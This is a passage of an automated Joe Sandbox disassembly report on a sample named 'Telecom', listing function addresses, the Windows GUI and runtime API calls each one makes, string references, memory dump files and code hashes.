ScreenToClient.USER32(?,?), ref: 004D88A6
ScreenToClient.USER32(?,?), ref: 004D88CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004D88E5

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 41220b8e88e3462d738ebbad1972a82755292e1e57271fd981418bffb838891b
Instruction ID: 8724eae0699a996b07a2578ed13fe35216ca59aeb7b454d1686705eef9a449a3
Opcode Fuzzy Hash: 41220b8e88e3462d738ebbad1972a82755292e1e57271fd981418bffb838891b
Instruction Fuzzy Hash: 8A1142B9D01209EFDB41DFA8C884AEEBBF5FB08310F508166E915E3610D735AA54DF94

Uniqueness

Uniqueness Score: -1.00%

Function 004D92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00441F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00441F87
Part of subcall function 00441F2D: SelectObject.GDI32(?,00000000), ref: 00441F96
Part of subcall function 00441F2D: BeginPath.GDI32(?), ref: 00441FAD
Part of subcall function 00441F2D: SelectObject.GDI32(?,00000000), ref: 00441FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 004D92E3
LineTo.GDI32(?,?,?), ref: 004D92F0
EndPath.GDI32(?), ref: 004D9300
StrokePath.GDI32(?), ref: 004D930E

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 6b669036a590d86146ffe1eed826aba578cb34e0dce2bb9750a42bb5b7a51d8c
Instruction ID: bf2257fc3836de567a249f458e7d9ef453b47dca6c53d6807d1da562c13f92cf
Opcode Fuzzy Hash: 6b669036a590d86146ffe1eed826aba578cb34e0dce2bb9750a42bb5b7a51d8c
Instruction Fuzzy Hash: 83F05E31006258BADB135F54AC0EFCE3F59AF0A324F048102FA15611E1C77955669BAD

Uniqueness

Uniqueness Score: -1.00%

Function 004421A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 004421BC
SetTextColor.GDI32(?,?), ref: 004421C6
SetBkMode.GDI32(?,00000001), ref: 004421D9
GetStockObject.GDI32(00000005), ref: 004421E1

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: e56880d198d29a2197eb8abc5b7a8cf6c688d52977b085a0df193e399b3576e4
Instruction ID: 5e237307938f17d712b3ccb8da7655b8bbe8ed2e6759d4c387eb7f3a73a0deda
Opcode Fuzzy Hash: e56880d198d29a2197eb8abc5b7a8cf6c688d52977b085a0df193e399b3576e4
Instruction Fuzzy Hash: 9FE06D31641240BADB216F74BC09BEE3B61EB16736F04862BF7FA581E0C77286409B18

Uniqueness

Uniqueness Score: -1.00%

Function 0049EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0049EC36
GetDC.USER32(00000000), ref: 0049EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0049EC60
ReleaseDC.USER32(?), ref: 0049EC81

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 7c7034bf8bb1793a9c2962f7aefa881858029fcb6a40303baaa773d52f851692
Instruction ID: d3091b440c6502e629825e4c142c550dbd416d11b34a40052fe1bb26425dd31e
Opcode Fuzzy Hash: 7c7034bf8bb1793a9c2962f7aefa881858029fcb6a40303baaa773d52f851692
Instruction Fuzzy Hash: C6E01A70C05204DFCF419FA1CD08A5DBBB5FB48311F10846BE84AE3250CB389902AF49

Uniqueness

Uniqueness Score: -1.00%

Function 0049EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0049EC4A
GetDC.USER32(00000000), ref: 0049EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0049EC60
ReleaseDC.USER32(?), ref: 0049EC81

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b0c665224cdf8be7c5635962f0ed76d9f4e9f422ab910191e083d5d7a98b356d
Instruction ID: 93ae0d9c0edf4251490f1d0f22e579a2c09cded1d24abafea13d8e3d865be6d3
Opcode Fuzzy Hash: b0c665224cdf8be7c5635962f0ed76d9f4e9f422ab910191e083d5d7a98b356d
Instruction Fuzzy Hash: 3AE01A70C01204DFCF419FA1CC08A5DBBB5FB48311F10846AE80AE3250C73899019F48

Uniqueness

Uniqueness Score: -1.00%

Function 00493616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON

Download Yara Rule

Strings

bnJ, xrefs: 00493631, 004938EA, 00493903, 00493B3F, 00493B58
@COM_EVENTOBJ, xrefs: 00493AD6

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: LoadString
String ID: @COM_EVENTOBJ$bnJ
API String ID: 2948472770-3109360154
Opcode ID: c83fd738006a0b0b1a497172f18d1352a00f42408dc7f5b688f542542c1b5f4d
Instruction ID: 7c23b74fda0c5e6387f35989127624f8d2d8633506cb6f6045697e53a2f50506
Opcode Fuzzy Hash: c83fd738006a0b0b1a497172f18d1352a00f42408dc7f5b688f542542c1b5f4d
Instruction Fuzzy Hash: 12F1A270A082009FDB24DF15C841B6BBBE0BF85709F14886EF49697361D779EE45CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004C85DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 004605B2: EnterCriticalSection.KERNEL32(0051170C,?,00000000,?,0044D22A,00513570,00000001,00000000,?,?,004BF023,?,?,00000000,00000001,?), ref: 004605BD
Part of subcall function 004605B2: LeaveCriticalSection.KERNEL32(0051170C,?,0044D22A,00513570,00000001,00000000,?,?,004BF023,?,?,00000000,00000001,?,00000001,00512430), ref: 004605FA

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

Part of subcall function 00460413: __onexit.LIBCMT ref: 00460419

__Init_thread_footer.LIBCMT ref: 004C8658

Part of subcall function 00460568: EnterCriticalSection.KERNEL32(0051170C,00000000,?,0044D258,00513570,004827C9,00000001,00000000,?,?,004BF023,?,?,00000000,00000001,?), ref: 00460572
Part of subcall function 00460568: LeaveCriticalSection.KERNEL32(0051170C,?,0044D258,00513570,004827C9,00000001,00000000,?,?,004BF023,?,?,00000000,00000001,?,00000001), ref: 004605A5

Strings

bnJ, xrefs: 004C85E5, 004C887F
Variable must be of type 'Object'., xrefs: 004C8697

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: Variable must be of type 'Object'.$bnJ
API String ID: 535116098-3946710355
Opcode ID: 98d27358708f83fee2d3f2e49669bf19b64b8590f0892e6ff3e52fe0be7d8c14
Instruction ID: bc7ae38c67cff7e31b3ae3f0dbb6e589540b9b595dbeac2f5b776b793eb69cff
Opcode Fuzzy Hash: 98d27358708f83fee2d3f2e49669bf19b64b8590f0892e6ff3e52fe0be7d8c14
Instruction Fuzzy Hash: AF917E78A00208AFDB44EF55D891EAE77B1FF48304F10805EF8066B392DB79AE41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0046E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0046E67D

Strings

pow, xrefs: 0046E655, 0046E672

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 4d75cf50d15c0ae65da1ec44512c1e269cd289b9890bd5591c8a148a61c0acb6
Instruction ID: 5f39e9d227be107a9b040e45232e41e29a72b8191ed9128ddc715c254572bca1
Opcode Fuzzy Hash: 4d75cf50d15c0ae65da1ec44512c1e269cd289b9890bd5591c8a148a61c0acb6
Instruction Fuzzy Hash: 25517B74A4810186C7117B15CD493EB2BE4EB10701FA0CD6FE099863AAFE3D8C969A4F

Uniqueness

Uniqueness Score: -1.00%

Function 0045A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0045A916

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 131107e49af0fd2b65b37493ebdd074658f119147168c053e27510c8477157e3
Instruction ID: 670d2f17fa5a605f6e6d55a6e4903fea7527605cb063da4e1e5b9dfc43890578
Opcode Fuzzy Hash: 131107e49af0fd2b65b37493ebdd074658f119147168c053e27510c8477157e3
Instruction Fuzzy Hash: 355142715042469FDF25DF28C040ABB7BA0EF12310F24416BEC919B381EB389C96CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004D4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 004D40BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004D40F8

Strings

static, xrefs: 004D4058

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: d67178d71c5f4bcc5839bfe1b312927ce30e1106ac8ee05893b1fa92e0686a55
Instruction ID: 636cfdd04c0ad52bcdc5facf3bcfce4f5a6b3b7c588b6b70127514cb6a012b38
Opcode Fuzzy Hash: d67178d71c5f4bcc5839bfe1b312927ce30e1106ac8ee05893b1fa92e0686a55
Instruction Fuzzy Hash: FC319271510604ABDB11DF64CC50BFB73A9FF88714F00861FF95587290DA79AC81D768

Uniqueness

Uniqueness Score: -1.00%

Function 004D4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 004D50BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004D50D2

Strings

', xrefs: 004D502C

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 4c9e574a7822b50ae604ec981fb227db27fee116be8fd1701879aec121fa8a07
Instruction ID: 3283c5c53871ec8f6c2ce050f219f65e0105e7f6099dd86c5327df58fb778545
Opcode Fuzzy Hash: 4c9e574a7822b50ae604ec981fb227db27fee116be8fd1701879aec121fa8a07
Instruction Fuzzy Hash: 26313674A0160A9FDB15CFA9C890BDABBB5FF49300F10406BE904AB391DB75A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004420B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0

Part of subcall function 00442234: GetWindowLongW.USER32(?,000000EB), ref: 00442242

GetParent.USER32(?), ref: 00483440
DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 004834CA

Strings

(Q, xrefs: 004420B9

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: LongWindow$ParentProc
String ID: (Q
API String ID: 2181805148-2768264020
Opcode ID: a17d2cd9861aeef0884569f8de693dadd0c947f0654e19358697d4b6704ad9a9
Instruction ID: f02fafba1500b730ffc7473fdca74fb8aec4b598bfe30c7ff8cff6a328b38431
Opcode Fuzzy Hash: a17d2cd9861aeef0884569f8de693dadd0c947f0654e19358697d4b6704ad9a9
Instruction Fuzzy Hash: EA210430201100AFDB26AF78CD49DBA3B62EF05760F540646F6251B3F2C3B98E52D718

Uniqueness

Uniqueness Score: -1.00%

Function 004D41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00447873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004478B1
Part of subcall function 00447873: GetStockObject.GDI32(00000011), ref: 004478C5
Part of subcall function 00447873: SendMessageW.USER32(00000000,00000030,00000000), ref: 004478CF

GetWindowRect.USER32(00000000,?), ref: 004D4216
GetSysColor.USER32(00000012), ref: 004D4230

Strings

static, xrefs: 004D41F3

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: f4d4bc130493075a83068588f85e55cfcb080922c47bfb24c849f94cc6431f70
Instruction ID: 68e0e190af518447fd9731ca7294c38a33aeba5abf40b763ebf11e871068ae4d
Opcode Fuzzy Hash: f4d4bc130493075a83068588f85e55cfcb080922c47bfb24c849f94cc6431f70
Instruction Fuzzy Hash: D0113772A10209AFDB00DFA8CC45AFA7BF8EB48358F01492AFD55E3250D738E851DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004A75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

CharUpperBuffW.USER32(?,?,?), ref: 004A761D
_wcslen.LIBCMT ref: 004A7629

Strings

STOP, xrefs: 004A7623, 004A7628

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: a837b7566ae69477189266fd8418c321f5e078939813c46c4b9dac882bda7dd1
Instruction ID: e217fe193175f9c59a7c98630bbbdb69dc7c34031456c49b5a0850e51730a569
Opcode Fuzzy Hash: a837b7566ae69477189266fd8418c321f5e078939813c46c4b9dac882bda7dd1
Instruction Fuzzy Hash: 0201C432A049278BCB309FBDDC80ABF77B5BF76764740053AE42192291EB39D900D698

Uniqueness

Uniqueness Score: -1.00%

Function 004A262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004A2699

Strings

ListBox, xrefs: 004A2663
ComboBox, xrefs: 004A2638

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 1b6409b4b73450e23547c3428a9076e97d520ad2693155b6756e78d8a05c080c
Instruction ID: b70fa358f96ff48791717684ccad77bf98d65c8d7f1d75cc2fc03b9a6c69574a
Opcode Fuzzy Hash: 1b6409b4b73450e23547c3428a9076e97d520ad2693155b6756e78d8a05c080c
Instruction Fuzzy Hash: 4101F575A02114BBDB08AB65CC41CFE7774EFA6314B40061FA832973C1DA799818DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 004A2525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620

SendMessageW.USER32(?,00000180,00000000,?), ref: 004A2593

Strings

ListBox, xrefs: 004A255D
ComboBox, xrefs: 004A2532

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: ecb1ae5ff4caadc3fa302e3206d7453259f8fd4846e8d07fc660747798a305e0
Instruction ID: 85114feb152ee26dbf643c93c2bf2215c7667846063b42cfcc6b460d02a23f5d
Opcode Fuzzy Hash: ecb1ae5ff4caadc3fa302e3206d7453259f8fd4846e8d07fc660747798a305e0
Instruction Fuzzy Hash: B801FCB5E411047BDB04E755C916DFF77A8EF66344F50002F7902632C1DA58DE08D6B9

Uniqueness

Uniqueness Score: -1.00%

Function 004A25A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620

SendMessageW.USER32(?,00000182,?,00000000), ref: 004A2615

Strings

ListBox, xrefs: 004A25E1
ComboBox, xrefs: 004A25B6

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 2b62d9af719f4f771fd4a792b56aeb801a5762341eb7263eb9f3ab1b7f1fd626
Instruction ID: f80f6f0cb17ca1cc79887fc6dce304c33675b36b8f696a42c3b168bebf4f4ba3
Opcode Fuzzy Hash: 2b62d9af719f4f771fd4a792b56aeb801a5762341eb7263eb9f3ab1b7f1fd626
Instruction Fuzzy Hash: C9012BB1E0110477DB05E755D901EFF77A8DF26344F50002BB802A72C1DBA8CE08D6B9

Uniqueness

Uniqueness Score: -1.00%

Function 004A26B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 004A2720

Strings

ListBox, xrefs: 004A26ED
ComboBox, xrefs: 004A26C2

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
